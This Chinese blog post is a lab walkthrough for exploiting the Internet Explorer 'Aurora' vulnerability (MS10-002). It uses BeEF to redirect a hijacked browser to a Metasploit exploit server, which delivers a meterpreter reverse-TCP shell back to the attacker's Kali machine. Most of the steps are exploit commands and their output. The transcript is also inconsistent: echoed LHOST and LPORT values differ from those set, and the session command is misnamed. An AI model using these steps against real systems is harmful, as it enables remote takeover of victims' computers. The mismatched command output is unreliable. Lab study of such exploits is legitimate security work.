beef+msf对IE浏览器的极光漏洞进行渗透利用获取shell

漏洞介绍

  • 1月20日,江民恶意网页监控系统监测到,上周五被确认的微软IE“极光漏洞”攻击代码已被黑客大面积利用,网上已出现数百个利用该漏洞的恶意网页,提醒广大电脑用户谨防遭受利用该漏洞的病毒攻击。
  • 上周,微软官方发布了Microsoft Security Advisory (979352)安全公告,确认在IE6/7/8版本中,存在零日漏洞,涉及的操作系统包括:Windows 2000 SP4, Windows XP/2003/Vista/2008,Windows 7。微软在安全公告中表示,IE在特定情况下,有可能访问已经被释放的内存对象导致任意代码执行,该漏洞可以被用来进行网页挂马。该漏洞即后来被称为“Aurora”(极光)的零日漏洞。
  • 微软官方发布的IE 0Day漏洞所影响的操作系统、浏览器版本:
    (1)Windows 2000 SP4下的IE6浏览器,该操作系统,目前通常被通常为学校或者企业机构使用。
    (2)Windows xp/Vista/Win7 系统下的IE6/IE7/IE8浏览器,大部分普通用户使用的操作系统版本。
    (3)Windows Server 2003/2008/2008r2系统下的IE6/IE7/IE8浏览器,此操作系统版本多为网站管理员使用。

实验环境

kali虚拟机(beef+msf工具 ip:192.168.138.132)
win10物理机(web服务器)
winxp 目标(ie6)

步骤

  • 打开msf

msf > use windows/browser/ms10_002_aurora
msf  exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms10_002_aurora) > show options
  • 配置相关地址和端口,其中192.168.138.132是kali的ip地址

msf exploit(ms10_002_aurora) > set SRVHOST 192.168.138.132 
SRVHOST => 192.168.138.132
msf  exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf  exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf  exploit(ms10_002_aurora) > set LHOST 192.168.138.132
LHOST => 192.168.1.11
msf  exploit(ms10_002_aurora) > set LPORT 4444
LPORT => 443
msf  exploit(ms10_002_aurora) > exploit 

  • 启动后利用beef劫持客户端浏览器进行跳转(图片里面被圈住的url)

beef劫持步骤:https://darker.hellosmile.xin/2020/04/17/XSS篇-Beef实验一:劫持客户端浏览器/

  • xp访问后如果有漏洞就会得到shell

session -i #获取上钩的计算机
session -i 1 #其中1是选择的id
shell #获取shell权限

 

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注